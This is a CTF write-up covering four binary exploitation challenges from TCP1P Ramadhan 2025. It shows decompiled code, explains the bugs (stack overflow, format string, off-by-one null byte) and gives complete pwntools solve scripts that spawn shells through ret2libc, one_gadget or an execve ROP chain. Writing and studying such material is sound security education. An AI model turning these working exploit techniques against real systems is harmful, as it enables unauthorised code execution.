Binary Exploitation

Name	Solves
Berbuka Dengan PIE 🥇	9
Perfect 🥇	5
About You 🥇	2
u-turn 🥇	1

Berbuka Dengan PIE

Description

Author: ilupii

Aku dan temanku bingung mau berbuka pake apa, tapi tiba tiba ada orang bagi bagi takjil kue pie

Connect: nc playground.tcp1p.team 19001

Initial Analysis

We are given files:

┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/Berbuka Dengan PIE]
└──╼ $tree .
.
├── chall
├── docker-compose.yml
├── Dockerfile
└── flag.txt

We do basic security checks on the file:

┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/Berbuka Dengan PIE]
└──╼ $pwn checksec chall
[*] '/home/mirai/ctf/TCP1P Ramadhan 2025/Berbuka Dengan PIE/chall'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No

Code Analysis

We open the chall file in IDA:

main()

int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // [rsp+Ch] [rbp-4h]

  setup(argc, argv, envp);
  while ( 1 )
  {
    menu();
    v3 = readint();
    if ( v3 == 4 )
    {
      puts("Bye bye!");
      exit(0);
    }
    if ( v3 > 4 )
    {
LABEL_14:
      puts("Pilihan tidak valid.");
    }
    else
    {
      switch ( v3 )
      {
        case 3:
          vuln();
          break;
        case 1:
          puts("emm enak tuuuu :)");
          puts("ak jg mw\n\n");
          break;
        case 2:
          puts("KUEEEEE PIEEEEEE KESUKAANKUUU");
          puts("KAMU JUGA MAU?");
          puts("BOLEH");
          puts("iniiiiiiiiii");
          puts("ketik 1 dulu kalau mau ehe");
          if ( (unsigned int)readint() == 1 )
            printf("oke okeeeyy ini pie nya untukmuu, %p\n", main);
          else
            puts("\naku marah banget");
          break;
        default:
          goto LABEL_14;
      }
    }
  }
}

if ( (unsigned int)readint() == 1 )
            printf("oke okeeeyy ini pie nya untukmuu, %p\n", main);
          else
            puts("\naku marah banget");

In here, when we chose the option 2, it will print out the main() address function. Since our binary is PIE enabled, this defeats the PIE enabled protection.

There is also a bug in vuln() function:

int vuln()
{
  char s[32]; // [rsp+0h] [rbp-20h] BYREF

  puts("WOIII JANGAN MASUK SINIII");
  printf("btw, kue pie nya enak gaaakkk hihi : ");
  fgets(s, 100, stdin);
  return printf("%s\n\n", s);
}

An obvious buffer overflow, fgets is taking in 100 characters into buffer s[32].

Buffer Overflow | OWASP Foundationowasp.org

Since there's is no win function, we will need to do ret2libc.

Exploitation

This one is straightforward, we will just need to calculate the offset from the main() function to the base address. The problem is when we are trying to leak libc. There is no easy way to put a libc address into RDI register since there are no pop rdi; ret; gadgets.

But when we see on debugger, when returning from the vuln() function, the RDI registers is actually populated with funlockfile address. With this knowledge, we can just call puts, calculate the offset from libc.sym['funlockfile'] to get the libc base address and then back to vuln to do a second buffer overflow.

Leaking libc

With our leaked libc base address, now we can use the function inside of libc. We can call system("/bin/sh") to get a shell and read the flag.

solve.py

#!/usr/bin/env python3
from pwn import *

# =========================================================
#                          SETUP                         
# =========================================================
exe = './chall_patched'
elf = context.binary = ELF(exe, checksec=True)
libc = './libc.so.6'
libc = ELF(libc, checksec=False)
context.log_level = 'info'
context.terminal = ["tmux", "splitw", "-h", "-p", "65"]
host, port = 'playground.tcp1p.team', 19001

def initialize(argv=[]):
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript)
    elif args.REMOTE:
        return remote(host, port)
    else:
        return process([exe] + argv)

gdbscript = '''
init-pwndbg
breakrva 0x1246
'''.format(**locals())

# =========================================================
#                         EXPLOITS
# =========================================================
def exploit():
    global io
    io = initialize()
    rop = ROP(exe)
    
    io.sendline(b'2')
    io.sendline(b'1')
    io.recvuntil(b'0x')
    
    # Calculate the offset to the main function
    elf.address = int(io.recvline().strip(), 16) - elf.symbols['main']
    io.sendline(b'3')
    payload = b'A'*40
    payload += p64(elf.symbols['puts'])
    payload += p64(elf.symbols['vuln']) # Call vuln again to do a second overflow
    io.sendlineafter(b':', payload)
    
    io.recvuntil(b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
    io.recvn(8)

    # Calculate the offset to libc base
    libc.address = u64(io.recvline().strip().ljust(8, b'\x00')) - libc.symbols['funlockfile']
    log.info('Libc base: %#x' % libc.address)

    # Now we call system("/bin/sh")
    payload = b'A'*40
    rop = ROP(libc)
    rop.raw(rop.ret.address)
    rop.system(next(libc.search(b'/bin/sh\x00')))
    io.sendline(payload + rop.chain())

    io.interactive()

if __name__ == '__main__':
    exploit()

Exploit ran against the remote server

Flag: RAMADAN{kue_pienyya_en4kk4nn_selamat_berbuka}

Perfect

Description

Author: ilupii

i have faith what i see, now i know i have met an angel in person and she looks perfect.... perfect kayak binarynya

Connect: nc playground.tcp1p.team 4156

Initial Analysis

We are given files:

┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/Perfect]
└──╼ $tree .
.
├── chall
├── docker-compose.yml
├── Dockerfile
└── flag.txt

1 directory, 4 files

We do basic security checks on the file:

┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/Perfect]
└──╼ $pwn checksec chall
[*] '/home/mirai/ctf/TCP1P Ramadhan 2025/Perfect/chall'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No

Code Analysis

There is a function called perfect():

perfect()

int perfect()
{
  char s[520]; // [rsp+0h] [rbp-210h] BYREF
  unsigned __int64 v2; // [rsp+208h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  fflush(_bss_start);
  puts("sebutkan di dunia ini apa yang 'Perfect' menurut kamu?");
  fgets(s, 512, stdin);
  printf(s);
  puts("apa alasan mengapa dia itu perfect ?");
  fgets(s, 512, stdin);
  printf(s);
  puts("\nnahh. 'i dont deserve this, she look perfect tonight:)");
  return fflush(_bss_start);
}

Though there are no buffer overflow, this function is vulnerable to format string vulnerability, on line 10 and 13. With format string vulnerability, we can do arbitrary read and arbitrary write. We are given two format string. So my instant thought is first to leak saved RIP of the current stack and also leak libc address, then on the second format string, we can write a one gadget.

I didn't realize there was a win function here lol

Exploitation

We found that the stack address and libc address lives at offset %1$p and %67$p . We then calculate the stack address offset to current stack RIP and calculate libc base address.

We get that the offset from saved RIP to current leak is stack_leak + 0x8

With these leaks in our hand, we can overwrite at any address using the second format string vulnerability. Thankfully, pwntools have the automation just to do that.

one_gadgets = [0xebc81, 0xebc85, 0xebc88, 0xebce2, 0xebd38, 0xebd3f, 0xebd43]
payload = fmtstr_payload(6, {rip: one_gadgets[0] + libc.address}, write_size='short')

Here i dumped one gadget using this tool:

GitHub - david942j/one_gadget: The best tool for finding one gadget RCE in libc.so.6GitHub

┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/Perfect]
└──╼ $one_gadget libc
0xebc81 execve("/bin/sh", r10, [rbp-0x70])
constraints:
  address rbp-0x78 is writable
  [r10] == NULL || r10 == NULL || r10 is a valid argv
  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp

0xebc85 execve("/bin/sh", r10, rdx)
constraints:
  address rbp-0x78 is writable
  [r10] == NULL || r10 == NULL || r10 is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp

0xebc88 execve("/bin/sh", rsi, rdx)
constraints:
  address rbp-0x78 is writable
  [rsi] == NULL || rsi == NULL || rsi is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp

0xebce2 execve("/bin/sh", rbp-0x50, r12)
constraints:
  address rbp-0x48 is writable
  r13 == NULL || {"/bin/sh", r13, NULL} is a valid argv
  [r12] == NULL || r12 == NULL || r12 is a valid envp

0xebd38 execve("/bin/sh", rbp-0x50, [rbp-0x70])
constraints:
  address rbp-0x48 is writable
  r12 == NULL || {"/bin/sh", r12, NULL} is a valid argv
  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp

0xebd3f execve("/bin/sh", rbp-0x50, [rbp-0x70])
constraints:
  address rbp-0x48 is writable
  rax == NULL || {rax, r12, NULL} is a valid argv
  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp

0xebd43 execve("/bin/sh", rbp-0x50, [rbp-0x70])
constraints:
  address rbp-0x50 is writable
  rax == NULL || {rax, [rbp-0x48], NULL} is a valid argv
  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp

When we send the payload, the return address will look like this:

Our saved RIP is overwritten with a one gadget

And we just continue execution and we will pop a shell.

#!/usr/bin/env python3
from pwn import *

# =========================================================
#                          SETUP                         
# =========================================================
exe = './chall_patched'
elf = context.binary = ELF(exe, checksec=True)
libc = './libc'
libc = ELF(libc, checksec=False)
context.log_level = 'info'
context.terminal = ["tmux", "splitw", "-h", "-p", "65"]
host, port = 'playground.tcp1p.team', 4156

def initialize(argv=[]):
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript)
    elif args.REMOTE:
        return remote(host, port)
    else:
        return process([exe] + argv)

gdbscript = '''
init-pwndbg
breakrva 0x1326
'''.format(**locals())

# =========================================================
#                         EXPLOITS
# =========================================================
def exploit():
    global io
    io = initialize()
    
    payload = b'%1$p|%67$p'
    io.sendlineafter(b'?', payload)
    io.recvn(1)
    libc.address = int(io.recvn(14), 16) - libc.sym['_IO_2_1_stdin_'] - 131
    io.recvn(1)
    stack_leak = int(io.recvn(14), 16)
    rip = stack_leak + 0x8
    one_gadgets = [0xebc81, 0xebc85, 0xebc88, 0xebce2, 0xebd38, 0xebd3f, 0xebd43]
    payload = fmtstr_payload(6, {rip: one_gadgets[0] + libc.address}, write_size='short')
    io.sendlineafter(b'?', payload)
    io.recvuntil(b"tonight:)\n")
    info(f'libc: {hex(libc.address)}')
    info(f'stack: {hex(stack_leak)}')
    info(f'rip: {hex(rip)}')
    
    io.interactive()
    
if __name__ == '__main__':
    exploit()

Exploit being ran against the remote server

Flag: RAMADAN{Ch1ll_br0_jusT_a_ret2win_w1th_f0rmat_string}

About You

Description

Author: ilupii

Do you think I have forgotten?

Connection: nc playground.tcp1p.team 19121

Initial Analysis

We are given files:

┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/About You]
└──╼ $tree .
.
├── chall
├── docker-compose.yml
├── Dockerfile
├── flag.txt
└── libc.so.6

1 directory, 5 files

We do basic security check:

┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/About You]
└──╼ $pwn checksec chall
[*] '/home/mirai/ctf/TCP1P Ramadhan 2025/About You/chall'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No

Tried to run it:

Code Analysis

There are several functions:

main()

int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // [rsp+Ch] [rbp-4h]

  setup(argc, argv, envp);
  puts("Mau tinggalkan pesan untuk seseorang gak????????");
  while ( 1 )
  {
    while ( 1 )
    {
      while ( 1 )
      {
        menu();
        printf("> ");
        v3 = readint();
        if ( v3 == 4 )
        {
          puts("bye");
          exit(0);
        }
        if ( v3 <= 4 )
          break;
LABEL_13:
        puts("pilih yg bener dong");
      }
      if ( v3 != 3 )
        break;
LABEL_11:
      puts("dalam perbaikan!!!");
    }
    if ( v3 > 3 )
      goto LABEL_13;
    if ( v3 != 1 )
    {
      if ( v3 != 2 )
        goto LABEL_13;
      siapa();
      goto LABEL_11;
    }
    mw();
  }
}

Here we see that there is a function called siapa() and mw() .

siapa()

unsigned __int64 siapa()
{
  char rand; // [rsp+Ch] [rbp-74h]
  char s[104]; // [rsp+10h] [rbp-70h] BYREF
  unsigned __int64 v3; // [rsp+78h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  rand = get_rand();
  printf("> ");
  fgets(s, 100, stdin);
  xor_encrypt(s, (unsigned int)rand);
  printf("hai : ");
  printf(s);
  putchar(10);
  return v3 - __readfsqword(0x28u);
}

We can see that there's a format string vulnerability at line 13. But first we need to see the get_rand() function first:

get_rand()

__int64 get_rand()
{
  int v0; // eax
  unsigned int seed; // [rsp+Ch] [rbp-4h]

  seed = time(0LL);
  srand(seed);
  v0 = rand();
  return (unsigned __int8)(((unsigned int)(v0 >> 31) >> 24) + v0) - ((unsigned int)(v0 >> 31) >> 24);
}

This code essentially sets up a seed using the current time, then generate a random number, then essentially taking only the lowest 8 bits of the rand() value. Equivalent with v0 & 0xff

Then there is xor_encrypt(s, rand):

xor_encrypt(s, rand)

size_t __fastcall xor_encrypt(const char *a1, char a2)
{
  size_t i; // rax
  size_t v4; // [rsp+18h] [rbp-8h]

  v4 = 0LL;
  for ( i = strlen(a1); v4 < i; i = strlen(a1) )
    a1[v4++] ^= a2;
  return v4;
}

This function basically xor'ing every character in the string with the value from rand.

Knowing that:

$$A \oplus B = C \\ and \\ A \oplus C = B \\ and \\ B \oplus C = A$$

We can XOR our chosen payload with the rand on server, and in the server, it will XOR it again, making it decrypted and reflect our actual payload. But in this case we want to use the format string, so we chose our payload so that it can leak addresses and stack canaries.

Then we go to the mw() function:

mw()

unsigned __int64 mw()
{
  char s[72]; // [rsp+0h] [rbp-50h] BYREF
  unsigned __int64 v2; // [rsp+48h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  printf("> ");
  fgets(s, 256, stdin);
  puts("oke");
  return v2 - __readfsqword(0x28u);
}

There's an obvious buffer overflow, fgets is taking 256 character into a buffer s[72]

Exploitation

So the idea is:

1. Leak addresses and canaries via format string, but first we need to XOR our payload with the random value

2. Do ret2libc

It took some amount of tries, because of latency issue

#!/usr/bin/env python3
from pwn import *
from ctypes import CDLL

# =========================================================
#                          SETUP                         
# =========================================================
exe = './chall_patched'
elf = context.binary = ELF(exe, checksec=True)
libc = './libc'
libc = ELF(libc, checksec=False)
libr = CDLL("libc.so.6")
context.log_level = 'info'
context.terminal = ["tmux", "splitw", "-h", "-p", "65"]
host, port = 'playground.tcp1p.team', 19121

def initialize(argv=[]):
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript)
    elif args.REMOTE:
        return remote(host, port)
    else:
        return process([exe] + argv)

gdbscript = '''
init-pwndbg
'''.format(**locals())

def siapa(payload):
    payload = xor(payload,libr.rand() & 0xff)
    io.sendlineafter(b'>', b'2')
    io.sendlineafter(b'>', payload)
    
def mw(payload):
    io.sendlineafter(b'>', b'1')
    io.sendlineafter(b'>', payload)
    
# =========================================================
#                         EXPLOITS
# =========================================================
def exploit():
    global io
    io = initialize()
    rop = ROP(exe)

    libr.srand(libr.time(0))
    siapa(b'%21$p|%27$p')
    response = io.recvline().strip()
    
    if b'0x' not in response:
        error('nuh uh')
        return
    
    response = response[6:]
    canary = int(response.split(b'|')[0], 16)
    libc.address = int(response.split(b'|')[1][:14], 16) - 0x29d90

    rop = ROP(libc)
    rop.raw(p64(rop.ret.address) * 9)
    rop.raw(canary)
    rop.call(p64(rop.ret.address) * 2)
    rop.system(next(libc.search(b'/bin/sh\x00')))

    mw(rop.chain())
    
    log.info(f'canary: {hex(canary)}')
    log.info(f'libc: {hex(libc.address)}')

    io.interactive()
    
if __name__ == '__main__':
    exploit()

Exploit being ran against the remote server

Flag: RAMADAN{ROP_with_leak_printf_it_easy_right????????????????}

u-turn

Description

Author: nouxia

turn 360 degrees and walk away

Connect: nc playground.tcp1p.team 33132

Initial Analysis

We are given files:

┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/u-turn]
└──╼ $tree .
.
├── chall
├── ld-linux-x86-64.so.2
└── libc.so.6

1 directory, 3 files

We do basic security checks:

┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/u-turn]
└──╼ $pwn checksec chall
[*] '/home/mirai/ctf/TCP1P Ramadhan 2025/u-turn/chall'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No

Code Analysis

There's a single function called vuln():

int vuln()
{
  _BYTE v1[256]; // [rsp+0h] [rbp-100h] BYREF

  printf("Good luck!\n>> ");
  __isoc99_scanf("%256s", v1);
  return printf("Goodbye!\n");
}

At first glance, this code didn't seem vulnerable to anything. But knowing that scanf appends null byte at the end of input. This code is instantly vulnerable to an off-by-one null byte overflow.

scanf, fscanf, sscanf, scanf_s, fscanf_s, sscanf_s - cppreference.comen.cppreference.com

CWE - CWE-193: Off-by-one Error (4.19.1)cwe.mitre.org

Exploitation

Finding the Offset

At first, i tried to fuzz this to find the offset where i start to overflow the buffer.

payload = cyclic(0x100, n=8)
io.sendlineafter(b'>> ', payload)

Fuzz 1

Fuzz 2

The offsets when we overwrite RIP is always different.

At this point, i am clueless, so i tried asking my friend Hygge, he said "why not just use ret slep", so i did just that.

With that knowledge in mind, i changed my payload to this:

payload = p64(rop.ret.address) * 31
payload += b'A'*8
io.sendlineafter(b'>> ', payload)

We got consistency!

Leaking libc

To leak libc, we can take a look the register state before it returns from vuln:

RDI points to libc.sym['funlockfile'] address, now we already have libc address in RDI, we will just need to call printf to get the leak.

Getting back to vuln

We will try to go back to vuln to get a second overflow. But, when we try to go back to vuln like this:

payload = p64(rop.ret.address) * 30 + p64(elf.plt['printf']) + p64(elf.sym['vuln'])
io.sendlineafter(b'>> ', payload)

We are greeted with this error:

RSP not aligned to 16 bytes

To counter this error, we can do a technique called ret2start. This will restart the binary. Restoring the stack state just like when we first executed the binary.

payload = p64(rop.ret.address) * 30 + p64(elf.plt['printf']) + p64(elf.sym['_start'])
io.sendlineafter(b'>> ', payload)

Now we do the same thing with the second overflow, but with the target execve("/bin/sh", 0, 0) because system("/bin/sh") always throws an error:

libc.address = u64(io.recv(6).ljust(8, b'\0')) - libc.sym['funlockfile']
rop = ROP(libc)
rop.raw(p64(rop.ret.address) * 23)
rop(rdi=next(libc.search(b'/bin/sh\x00')), rsi=0, rdx=0, rax=0x3b)
rop.call(rop.find_gadget(['syscall', 'ret'])[0])
io.sendlineafter(b'>> ', rop.chain())

We try to exploit this against the remote server we will got the flag:

Exploit being ran against the remote server

solve.py

#!/usr/bin/env python3
from pwn import *

# =========================================================
#                          SETUP                         
# =========================================================
exe = './chall_patched'
elf = context.binary = ELF(exe, checksec=True)
libc = './libc'
libc = ELF(libc, checksec=False)
context.log_level = 'info'
context.terminal = ["tmux", "splitw", "-h", "-p", "65"]
host, port = 'playground.tcp1p.team', 33132

def initialize(argv=[]):
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript)
    elif args.REMOTE:
        return remote(host, port)
    else:
        return process([exe] + argv)

gdbscript = '''
init-pwndbg
# break *vuln
# break *vuln+72
break *0x00000000004011cc
# break *0x4011b2
break *vuln
'''.format(**locals())

# =========================================================
#                         EXPLOITS
# =========================================================
def exploit():
    global io
    io = initialize()
    rop = ROP(exe)

    payload = p64(rop.ret.address) * 30 + p64(elf.plt['printf']) + p64(elf.sym['_start'])
    io.sendlineafter(b'>> ', payload)
    io.recvline()

    libc.address = u64(io.recv(6).ljust(8, b'\0')) - libc.sym['funlockfile']
    rop = ROP(libc)
    rop.raw(p64(rop.ret.address) * 23)
    rop(rdi=next(libc.search(b'/bin/sh\x00')), rsi=0, rdx=0, rax=0x3b)
    rop.call(rop.find_gadget(['syscall', 'ret'])[0])
    io.sendlineafter(b'>> ', rop.chain())

    success(f'libc @ {hex(libc.address)}')
    io.interactive()

if __name__ == '__main__':
    exploit()

Flag: RAMADAN{RbP_nUlL_By73_574cK_P1V07}